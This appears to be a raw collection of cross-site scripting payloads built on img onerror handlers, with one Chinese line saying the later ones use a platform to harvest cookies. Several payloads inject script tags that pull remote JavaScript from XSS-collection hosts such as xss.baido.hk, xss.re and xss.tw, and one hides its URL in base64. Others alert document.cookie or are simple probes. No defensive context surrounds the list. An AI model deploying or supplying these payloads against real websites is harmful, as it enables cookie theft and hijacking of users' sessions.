<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
<img src=# onerror=alert(document.cookie)>
The following use a platform to harvest cookies:
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src="#">
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>